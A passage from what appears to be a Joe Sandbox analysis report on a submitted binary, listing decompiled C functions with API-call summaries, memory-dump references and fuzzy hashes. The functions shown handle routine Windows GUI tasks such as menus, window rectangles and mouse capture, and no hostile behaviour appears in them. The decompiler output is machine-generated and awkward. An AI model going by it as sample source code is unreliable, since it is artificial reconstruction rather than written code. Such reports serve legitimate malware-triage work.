                  								if(_t68 != 0 && _t68 != 0xffffffff) {
                  									_push(0);
                  									goto L32;
                  								}
                  								L38:
                  								_v40 = _v40 + 1;
                  								_t59 = _v40;
                  							} while (_t59 < _v16);
                  							goto L39;
                  						}
                  					}
                  					_t75 =  *_t54;
                  					_t79 = _t75;
                  					_t59 =  *((intOrPtr*)( *_t75 + 0x74))(_t90, _a8, 0);
                  					if(_t59 != 0) {
                  						goto L39;
                  					}
                  					goto L3;
                  				}
                  				return _t53;
                  			}


                  APIs
                    • Part of subcall function 0041FEC0: GetFocus.USER32(?,?,00404DAE,?), ref: 0041FEC6
                    • Part of subcall function 0041FEC0: GetParent.USER32(00000000), ref: 0041FEEE
                    • Part of subcall function 0041FEC0: GetWindowLongA.USER32 ref: 0041FF09
                    • Part of subcall function 0041FEC0: GetParent.USER32(?), ref: 0041FF17
                    • Part of subcall function 0041FEC0: GetDesktopWindow.USER32 ref: 0041FF1B
                    • Part of subcall function 0041FEC0: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041FF2F
                  • GetMenu.USER32(?), ref: 00409512
                  • GetMenuItemCount.USER32 ref: 00409542
                  • GetSubMenu.USER32 ref: 00409553
                  • GetMenuItemCount.USER32 ref: 0040957B
                  • GetMenuItemID.USER32(?,00000000), ref: 004095BC
                  • GetMenuItemCount.USER32 ref: 004095F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                  • String ID:
                  • API String ID: 4186786570-0
                  • Opcode ID: f4d0c37e46bafa235edddf6592dad6ee73eab23a505eaa072581090a8f977f9a
                  • Instruction ID: a1f41ced9be115099f6dad47dd6d5c3d84b9b036084ce77a4042d75358e62180
                  • Opcode Fuzzy Hash: f4d0c37e46bafa235edddf6592dad6ee73eab23a505eaa072581090a8f977f9a
                  • Instruction Fuzzy Hash: 4D517C32900606AFCF229F66C9806AEB7B5FF45304F24457BE416B3292D739DE41CB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E004255C9(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr _v8;
                  				char _v12;
                  				struct tagRECT _v28;
                  				struct tagRECT _v44;
                  				struct tagRECT _v60;
                  				void* _t81;
                  				int _t83;
                  				int _t90;
                  				intOrPtr _t92;
                  				intOrPtr _t111;
                  				int _t125;
                  				void* _t134;
                  				void* _t139;
                  				intOrPtr _t143;
                  				void* _t145;
                  				void* _t149;
                  
                  				_t145 = __edi;
                  				_t134 = __ecx;
                  				_t81 = _a4 -  *((intOrPtr*)(__ecx + 4));
                  				_t139 = _a8 -  *((intOrPtr*)(__ecx + 8));
                  				_t143 =  *((intOrPtr*)(__ecx + 0x8c));
                  				_t149 = 2;
                  				if(_t143 == 0xa) {
                  					L7:
                  					 *((intOrPtr*)(_t134 + 0x28)) =  *((intOrPtr*)(_t134 + 0x28)) + _t81;
                  					L9:
                  					_t83 =  *((intOrPtr*)(_t134 + 0x30)) -  *((intOrPtr*)(_t134 + 0x28));
                  					__eflags = _t83;
                  					L10:
                  					if(_t83 < 0) {
                  						_t83 = 0;
                  					}
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x68)))) + 0x140))( &_v12, _t83, _t149, _t145);
                  					_v44.left = GetSystemMetrics(0x4c);
                  					_v44.top = GetSystemMetrics(0x4d);
                  					_v44.right = GetSystemMetrics(0x4e) + _v44.left;
                  					_t90 = GetSystemMetrics(0x4f);
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_v44.bottom = _t90 + _v44.top;
                  					_t92 =  *((intOrPtr*)(_t134 + 0x8c));
                  					asm("movsd");
                  					if(_t92 == 0xa || _t92 == 0xc) {
                  						_v28.left =  *((intOrPtr*)(_t134 + 0x58)) -  *((intOrPtr*)(_t134 + 0x60)) - _v12 + _v28.right;
                  						_v28.top =  *((intOrPtr*)(_t134 + 0x5c)) -  *((intOrPtr*)(_t134 + 0x64)) - _v8 + _v28.bottom;
                  						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
                  						if(__eflags != 0) {
                  							 *((intOrPtr*)(_t134 + 0x38)) =  *((intOrPtr*)(_t134 + 0x40)) - _v12;
                  							_t111 =  *((intOrPtr*)(_t134 + 0x44)) - _v8;
                  							__eflags = _t111;
                  							 *((intOrPtr*)(_t134 + 0x3c)) = _t111;
                  							 *(_t134 + 0x48) = _v28.left;
                  							 *((intOrPtr*)(_t134 + 0x4c)) = _v28.top;
                  						}
                  					} else {
                  						_v28.right =  *((intOrPtr*)(_t134 + 0x60)) -  *((intOrPtr*)(_t134 + 0x58)) + _v28.left + _v12;
                  						_v28.bottom =  *((intOrPtr*)(_t134 + 0x64)) -  *((intOrPtr*)(_t134 + 0x5c)) + _v28.top + _v8;
                  						_t125 = IntersectRect( &_v60,  &_v44,  &_v28);
                  						_t162 = _t125;
                  						if(_t125 != 0) {
                  							 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x38)) + _v12;
                  							 *((intOrPtr*)(_t134 + 0x44)) =  *((intOrPtr*)(_t134 + 0x3c)) + _v8;
                  							 *((intOrPtr*)(_t134 + 0x50)) = _v28.right;
                  							 *((intOrPtr*)(_t134 + 0x54)) = _v28.bottom;
                  						}
                  					}
                  					 *((intOrPtr*)(_t134 + 4)) = _a4;
                  					 *((intOrPtr*)(_t134 + 8)) = _a8;
                  					return E004253B4(_t134, _t162, 0);
                  				}
                  				if(_t143 == 0xb) {
                  					__eflags = _t143 - 0xa;
                  					if(_t143 != 0xa) {
                  						_t14 = __ecx + 0x30;
                  						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t81;
                  						__eflags =  *_t14;
                  						goto L9;
                  					}
                  					goto L7;
                  				} else {
                  					_t149 = 0x22;
                  					if(_t143 != 0xc) {
                  						_t8 = __ecx + 0x34;
                  						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t139;
                  						__eflags =  *_t8;
                  					} else {
                  						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t139;
                  					}
                  					_t83 =  *((intOrPtr*)(_t134 + 0x34)) -  *((intOrPtr*)(_t134 + 0x2c));
                  					goto L10;
                  				}
                  			}


                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$IntersectRect
                  • String ID:
                  • API String ID: 1124862357-0
                  • Opcode ID: 1d65fe79de01662ac3f1d7a7a64e2e1c0a778bd027e79d9ab25bf57574dbdca1
                  • Instruction ID: b54a87e4effa50ea3713c06c2bd7ae8c4480a2440e2015c51580e4fd092a2efb
                  • Opcode Fuzzy Hash: 1d65fe79de01662ac3f1d7a7a64e2e1c0a778bd027e79d9ab25bf57574dbdca1
                  • Instruction Fuzzy Hash: 2851A472A00219DFCF54DFACD5C5A9EBBF4BF08314F5441A6E908EB20AE634E980CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E0042BA2F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				long _t67;
                  				long _t70;
                  				intOrPtr _t72;
                  				long _t77;
                  				intOrPtr* _t89;
                  				intOrPtr* _t91;
                  				void* _t92;
                  				intOrPtr* _t93;
                  				intOrPtr* _t97;
                  				void* _t105;
                  				void* _t109;
                  				intOrPtr _t111;
                  				void* _t125;
                  				intOrPtr* _t126;
                  				void* _t130;
                  
                  				_t122 = __edx;
                  				_push(0x10);
                  				E00431A9B(E0044C7C2, __ebx, __edi, __esi);
                  				_t125 = __ecx;
                  				_t100 = 0;
                  				_t129 = 1;
                  				 *(_t130 - 0x1c) = 0;
                  				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
                  					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000;
                  					if(__eflags == 0) {
                  						L19:
                  						_push( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0x74)) + 0x1c)));
                  						E00406039(_t100,  *((intOrPtr*)(_t130 + 8)), _t122, _t125, _t129, __eflags);
                  						L20:
                  						return E00431B73( *((intOrPtr*)(_t130 + 8)));
                  					}
                  					__eflags =  *(__ecx + 0x20);
                  					if(__eflags == 0) {
                  						goto L19;
                  					}
                  					E004014C0(_t130 - 0x10, __edx);
                  					 *(_t130 - 4) = 1;
                  					_t129 = 0x104;
                  					_t67 = E004014F0(_t130 - 0x10, 0x104);
                  					_t100 = GetParent;
                  					 *(_t130 - 0x1c) = _t67;
                  					_t70 = SendMessageA( *(E0040EE3C(GetParent, _t130 - 0x10, GetParent( *(_t125 + 0x20))) + 0x20), 0x464, 0x104,  *(_t130 - 0x1c));
                  					_t105 = _t130 - 0x10;
                  					__eflags = _t70;
                  					if(_t70 >= 0) {
                  						E0040A356(_t105, 0xffffffff);
                  					} else {
                  						E00401E30(_t105);
                  					}
                  					_t72 =  *((intOrPtr*)(_t130 - 0x10));
                  					__eflags =  *(_t72 - 0xc);
                  					if( *(_t72 - 0xc) == 0) {
                  						L18:
                  						 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
                  						__eflags =  *((intOrPtr*)(_t130 - 0x10)) + 0xfffffff0;
                  						E004010B0( *((intOrPtr*)(_t130 - 0x10)) + 0xfffffff0, _t122);
                  						goto L19;
                  					} else {
                  						 *(_t130 - 0x1c) = E004014F0(_t130 - 0x10, _t129);
                  						_t77 = SendMessageA( *(E0040EE3C(_t100, _t130 - 0x10, GetParent( *(_t125 + 0x20))) + 0x20), 0x465, _t129,  *(_t130 - 0x1c));
                  						_t109 = _t130 - 0x10;
                  						__eflags = _t77;
                  						if(_t77 >= 0) {
                  							E0040A356(_t109, 0xffffffff);
                  							E00405562( *((intOrPtr*)(_t130 + 8)), __eflags, _t130 - 0x10);
                  							_t111 =  *((intOrPtr*)(_t130 - 0x10));
                  							L9:
                  							E004010B0(_t111 + 0xfffffff0, _t122);
                  							goto L20;
                  						}
                  						E00401E30(_t109);
                  						goto L18;
                  					}
                  				}
                  				if( *(__ecx + 0x20) == 0) {
                  					goto L19;
                  				}
                  				E004014C0(_t130 - 0x14, __edx);
                  				_t126 =  *((intOrPtr*)(_t125 + 0x80));
                  				_push(_t130 - 0x10);
                  				_push(_t126);
                  				 *(_t130 - 4) = 0;
                  				if( *((intOrPtr*)( *_t126 + 0x38))() < 0) {
                  					L8:
                  					E00405562( *((intOrPtr*)(_t130 + 8)), _t137, _t130 - 0x14);
                  					_t111 =  *((intOrPtr*)(_t130 - 0x14));
                  					goto L9;
                  				}
                  				_t89 =  *((intOrPtr*)(_t130 - 0x10));
                  				_push(_t130 - 0x1c);
                  				_push(0x400000);
                  				_push(_t89);
                  				if( *((intOrPtr*)( *_t89 + 0x18))() != 1) {
                  					L5:
                  					_t91 =  *((intOrPtr*)(_t130 - 0x10));
                  					_t122 = _t130 - 0x18;
                  					 *((intOrPtr*)(_t130 - 0x18)) = _t100;
                  					_t92 =  *((intOrPtr*)( *_t91 + 0x14))(_t91, 0x80058000, _t130 - 0x18);
                  					_t137 = _t92;
                  					if(_t92 >= 0) {
                  						E00405DD1(_t130 - 0x14,  *((intOrPtr*)(_t130 - 0x18)));
                  						E0040A356(_t130 - 0x14, 0xffffffff);
                  						__imp__CoTaskMemFree( *((intOrPtr*)(_t130 - 0x18)));
                  					}
                  					L7:
                  					_t93 =  *((intOrPtr*)(_t130 - 0x10));
                  					 *((intOrPtr*)( *_t93 + 8))(_t93);
                  					goto L8;
                  				}
                  				_t97 =  *((intOrPtr*)(_t130 - 0x10));
                  				_t122 = _t130 - 0x1c;
                  				_push(_t130 - 0x1c);
                  				_push(0x20000000);
                  				_push(_t97);
                  				if( *((intOrPtr*)( *_t97 + 0x18))() == 0) {
                  					goto L7;
                  				}
                  				goto L5;
                  			}



















                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042BA36
                  • CoTaskMemFree.OLE32(?,000000FF), ref: 0042BAD3
                  • GetParent.USER32(?), ref: 0042BB3C
                  • SendMessageA.USER32(?,00000464,00000104,?), ref: 0042BB50
                  • GetParent.USER32(?), ref: 0042BB83
                  • SendMessageA.USER32(?,00000465,00000104,?), ref: 0042BB97
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageParentSend$FreeH_prolog3Task
                  • String ID:
                  • API String ID: 526180827-0
                  • Opcode ID: b8465ec876a2d8c5955011488c88846620c8314f3b98150dc5d40c38e7113ddd
                  • Instruction ID: 4b4f0189a4f3fee0b3fcf5c9af0e9106a490cf374a1a58ec6f3dfcf374972a15
                  • Opcode Fuzzy Hash: b8465ec876a2d8c5955011488c88846620c8314f3b98150dc5d40c38e7113ddd
                  • Instruction Fuzzy Hash: 48512F70A0021ADFCB04EFA1CC859AEB775FF44318B54452AB525A72E1DB38A941CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E004258CF(void* __ecx, intOrPtr __edx) {
                  				intOrPtr _v8;
                  				struct tagMSG _v32;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* _t30;
                  				void* _t32;
                  				void* _t34;
                  				void* _t36;
                  				intOrPtr* _t37;
                  				void* _t41;
                  				intOrPtr _t53;
                  				void* _t54;
                  				void* _t56;
                  				void* _t57;
                  				intOrPtr* _t58;
                  
                  				_t55 = __edx;
                  				_t51 = __ecx;
                  				_t56 = GetCapture;
                  				_t57 = __ecx;
                  				if(GetCapture() != 0) {
                  					L20:
                  					return 0;
                  				}
                  				E0040EE3C(0, _t51, SetCapture( *( *((intOrPtr*)(_t57 + 0x68)) + 0x20)));
                  				if(E0040EE3C(0, _t51, GetCapture()) !=  *((intOrPtr*)(_t57 + 0x68))) {
                  					L19:
                  					E0042573F(0, _t57, _t68);
                  					goto L20;
                  				} else {
                  					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
                  						_t30 = _v32.message - 0x100;
                  						if(_t30 == 0) {
                  							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                  							if( *((intOrPtr*)(_t57 + 0x88)) != 0) {
                  								_t51 = _t57;
                  								E00425593(_t57, _v32.wParam, 1);
                  							}
                  							__eflags = _v32.wParam - 0x1b;
                  							if(__eflags != 0) {
                  								L18:
                  								_t32 = E0040EE3C(0, _t51, GetCapture());
                  								_t68 = _t32 -  *((intOrPtr*)(_t57 + 0x68));
                  								if(_t32 ==  *((intOrPtr*)(_t57 + 0x68))) {
                  									continue;
                  								}
                  							}
                  							goto L19;
                  						}
                  						_t34 = _t30 - 1;
                  						if(_t34 == 0) {
                  							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                  							if(__eflags != 0) {
                  								_t51 = _t57;
                  								E00425593(_t57, _v32.wParam, 0);
                  							}
                  							goto L18;
                  						}
                  						_t36 = _t34 - 0xff;
                  						if(_t36 == 0) {
                  							_t53 = _v32.pt;
                  							_t55 = _v8;
                  							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                  							_push(_t53);
                  							_push(_t53);
                  							_t37 = _t58;
                  							 *_t37 = _t53;
                  							 *((intOrPtr*)(_t37 + 4)) = _v8;
                  							_t51 = _t57;
                  							if( *((intOrPtr*)(_t57 + 0x88)) == 0) {
                  								E004255C9(_t51, _t56);
                  							} else {
                  								E0042551E(_t51);
                  							}
                  							goto L18;
                  						}
                  						_t41 = _t36;
                  						if(_t41 == 0) {
                  							_t54 = _t57;
                  							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                  							if(__eflags == 0) {
                  								E00425888(0, _t54, __eflags);
                  							} else {
                  								E00425782(_t54, _t55, _t56, _t57, __eflags);
                  							}
                  							return 1;
                  						}
                  						if(_t41 == 0) {
                  							goto L19;
                  						}
                  						DispatchMessageA( &_v32);
                  						goto L18;
                  					}
                  					_push(_v32.wParam);
                  					E00414E3D();
                  					goto L19;
                  				}
                  			}




















                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Capture$Message$Dispatch
                  • String ID:
                  • API String ID: 3654672037-0
                  • Opcode ID: d4753f6ef7ab843eaa07548e5f8b2e81fcb1612e08e19c19a32e1eae81b1b269
                  • Instruction ID: 46a2a674bff202cc99884ab51a775dfe1e4511bcd1986915b05b1171fc58927a
                  • Opcode Fuzzy Hash: d4753f6ef7ab843eaa07548e5f8b2e81fcb1612e08e19c19a32e1eae81b1b269
                  • Instruction Fuzzy Hash: D031D9B1710A25DFDF20ABB6E84597F76A8EF44365F90042BA041D2250CA3CDCC1C67E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004131F2(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t78;
                  				void* _t79;
                  				void* _t80;
                  
                  				_t80 = __eflags;
                  				E00431A9B(E0044BF26, __ebx, __edi, __esi);
                  				_t78 = __ecx;
                  				E00422EAE(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
                  				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
                  				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
                  				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
                  				E00422BFB(_t78, _t79 - 0x1c);
                  				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                  				E00422646(_t79 - 0x40, _t79 - 0x2c);
                  				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                  				 *((intOrPtr*)( *_t78 + 0x150))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
                  				E0042268D(_t79 - 0x40, _t79 - 0x1c);
                  				SendMessageA( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
                  				 *((intOrPtr*)( *_t78 + 0x158))(_t79 - 0x40, _t79 - 0x1c);
                  				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
                  				return E00431B73(E00422F02(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
                  			}







                  APIs
                  • __EH_prolog3.LIBCMT ref: 00421612
                    • Part of subcall function 00422EAE: __EH_prolog3.LIBCMT ref: 00422EB5
                    • Part of subcall function 00422EAE: GetWindowDC.USER32(00000000,00000004,00419EC3,00000000,00000018,00418677,00000001,?,?,004527FC,004527FC), ref: 00422EE1
                  • GetClientRect.USER32 ref: 0042162D
                  • GetWindowRect.USER32 ref: 0042163A
                    • Part of subcall function 00422BFB: ScreenToClient.USER32 ref: 00422C0C
                    • Part of subcall function 00422BFB: ScreenToClient.USER32 ref: 00422C19
                  • OffsetRect.USER32(?,?,?), ref: 00421661
                    • Part of subcall function 00422646: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0042266F
                    • Part of subcall function 00422646: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00422684
                  • OffsetRect.USER32(?,?,?), ref: 0042167F
                    • Part of subcall function 0042268D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 004226B6
                    • Part of subcall function 0042268D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 004226CB
                  • SendMessageA.USER32(?,00000014,?,00000000), ref: 004216A9
                    • Part of subcall function 00422F02: __EH_prolog3.LIBCMT ref: 00422F09
                    • Part of subcall function 00422F02: ReleaseDC.USER32 ref: 00422F26
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                  • String ID:
                  • API String ID: 2952362992-0
                  • Opcode ID: 4d7821c7f4b74c1374008cb86f107091761dbfdb9a1f2cd9f1ce72ed74d0e9cc
                  • Instruction ID: 54d9f2b2cb95faf2a6f24e4230d7989ba867047feb8828be0b4a30da0d48dd3d
                  • Opcode Fuzzy Hash: 4d7821c7f4b74c1374008cb86f107091761dbfdb9a1f2cd9f1ce72ed74d0e9cc
                  • Instruction Fuzzy Hash: 65210A7291001AEFDB15EBA4DC95DFEB7B8FF18305F40411AF152A71A0EB646A06CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E00429B26(void* __ecx) {
                  				struct HINSTANCE__* _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HACCEL__* _t31;
                  				struct HINSTANCE__* _t33;
                  				struct HINSTANCE__* _t37;
                  				struct HINSTANCE__* _t41;
                  				void* _t56;
                  
                  				_push(__ecx);
                  				_t56 = __ecx;
                  				_t48 = __ecx + 0x64;
                  				_t31 =  *(__ecx + 0x64);
                  				if( *((intOrPtr*)(_t31 - 0xc)) == 0) {
                  					_t31 = E00402720(_t48,  *((intOrPtr*)(__ecx + 0x40)));
                  				}
                  				_t53 = LoadMenuA;
                  				_t45 = LoadAcceleratorsA;
                  				if( *(_t56 + 0x48) != 0) {
                  					_t60 =  *((intOrPtr*)(_t56 + 0x30));
                  					if( *((intOrPtr*)(_t56 + 0x30)) == 0) {
                  						_t41 =  *(E0041F363(LoadAcceleratorsA, LoadMenuA, _t56, _t60) + 0xc);
                  						_v8 = _t41;
                  						 *((intOrPtr*)(_t56 + 0x30)) = LoadMenuA(_t41,  *(_t56 + 0x48) & 0x0000ffff);
                  						_t31 = LoadAcceleratorsA(_v8,  *(_t56 + 0x48) & 0x0000ffff);
                  						 *(_t56 + 0x34) = _t31;
                  					}
                  				}
                  				if( *(_t56 + 0x44) != 0) {
                  					_t62 =  *((intOrPtr*)(_t56 + 0x38));
                  					if( *((intOrPtr*)(_t56 + 0x38)) == 0) {
                  						_t37 =  *(E0041F363(_t45, _t53, _t56, _t62) + 0xc);
                  						_v8 = _t37;
                  						 *((intOrPtr*)(_t56 + 0x38)) = LoadMenuA(_t37,  *(_t56 + 0x44) & 0x0000ffff);
                  						_t31 = LoadAcceleratorsA(_v8,  *(_t56 + 0x44) & 0x0000ffff);
                  						 *(_t56 + 0x3c) = _t31;
                  					}
                  				}
                  				if( *(_t56 + 0x4c) != 0) {
                  					_t64 =  *((intOrPtr*)(_t56 + 0x28));
                  					if( *((intOrPtr*)(_t56 + 0x28)) == 0) {
                  						_t33 =  *(E0041F363(_t45, _t53, _t56, _t64) + 0xc);
                  						_v8 = _t33;
                  						 *((intOrPtr*)(_t56 + 0x28)) = LoadMenuA(_t33,  *(_t56 + 0x4c) & 0x0000ffff);
                  						_t31 = LoadAcceleratorsA(_v8,  *(_t56 + 0x4c) & 0x0000ffff);
                  						 *(_t56 + 0x2c) = _t31;
                  					}
                  				}
                  				return _t31;
                  			}














                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Load$AcceleratorsMenu
                  • String ID:
                  • API String ID: 144087665-0
                  • Opcode ID: 63325f3d1794a7671403ffaf6cbc211b7d823684c930ae83eaf93ae77def3f67
                  • Instruction ID: da6f9872910fb6daf6ffe8524f97512d90dd08739e674e0cfadb783181bbf01d
                  • Opcode Fuzzy Hash: 63325f3d1794a7671403ffaf6cbc211b7d823684c930ae83eaf93ae77def3f67
                  • Instruction Fuzzy Hash: 13215E71500724EFC720DB66D984B6AF7F4FF08714F50482EE58282A60D379BC80DB24
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00416EE5(struct HWND__* _a4, struct HWND__** _a8) {
                  				struct HWND__* _t8;
                  				void* _t14;
                  				struct HWND__** _t16;
                  				struct HWND__* _t17;
                  				struct HWND__* _t18;
                  
                  				_t18 = _a4;
                  				if(_t18 != 0) {
                  					L5:
                  					if((GetWindowLongA(_t18, 0xfffffff0) & 0x40000000) == 0) {
                  						L8:
                  						_t17 = _t18;
                  						_t8 = _t18;
                  						if(_t18 == 0) {
                  							L10:
                  							if(_a4 == 0 && _t18 != 0) {
                  								_t18 = GetLastActivePopup(_t18);
                  							}
                  							_t16 = _a8;
                  							if(_t16 != 0) {
                  								if(_t17 == 0 || IsWindowEnabled(_t17) == 0 || _t17 == _t18) {
                  									 *_t16 =  *_t16 & 0x00000000;
                  								} else {
                  									 *_t16 = _t17;
                  									EnableWindow(_t17, 0);
                  								}
                  							}
                  							return _t18;
                  						} else {
                  							goto L9;
                  						}
                  						do {
                  							L9:
                  							_t17 = _t8;
                  							_t8 = GetParent(_t8);
                  						} while (_t8 != 0);
                  						goto L10;
                  					}
                  					_t18 = GetParent(_t18);
                  					L7:
                  					if(_t18 != 0) {
                  						goto L5;
                  					}
                  					goto L8;
                  				}
                  				_t14 = E00416EA0();
                  				if(_t14 != 0) {
                  					L4:
                  					_t18 =  *(_t14 + 0x20);
                  					goto L7;
                  				}
                  				_t14 = E00403AA0();
                  				if(_t14 != 0) {
                  					goto L4;
                  				}
                  				_t18 = 0;
                  				goto L8;
                  			}









                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                  • String ID:
                  • API String ID: 670545878-0
                  • Opcode ID: 13871ef3759c618d8f268107ebfde00254af1969d96d9b07d1e74764d8d3a6e7
                  • Instruction ID: 9e4f7b4cd4cbdf7f40bd5940dfb5179cf4edfd5842048a0ac895ae762c2329d2
                  • Opcode Fuzzy Hash: 13871ef3759c618d8f268107ebfde00254af1969d96d9b07d1e74764d8d3a6e7
                  • Instruction Fuzzy Hash: BC1194366052316BDB311B6AAD447AB66A86F55B60F17012BED04A7344DB38CC838ADD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E0040819E(intOrPtr __ecx, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				void* __edi;
                  				void* __esi;
                  				struct HWND__* _t17;
                  				signed int _t22;
                  				struct HWND__* _t32;
                  				void* _t34;
                  
                  				_t30 = __ecx;
                  				_push(__ecx);
                  				_v8 = __ecx;
                  				_t17 = GetWindow(GetDesktopWindow(), 5);
                  				_t32 = _t17;
                  				_t36 = _t32;
                  				if(_t32 == 0) {
                  					L14:
                  					return _t17;
                  				} else {
                  					_push(_t34);
                  					do {
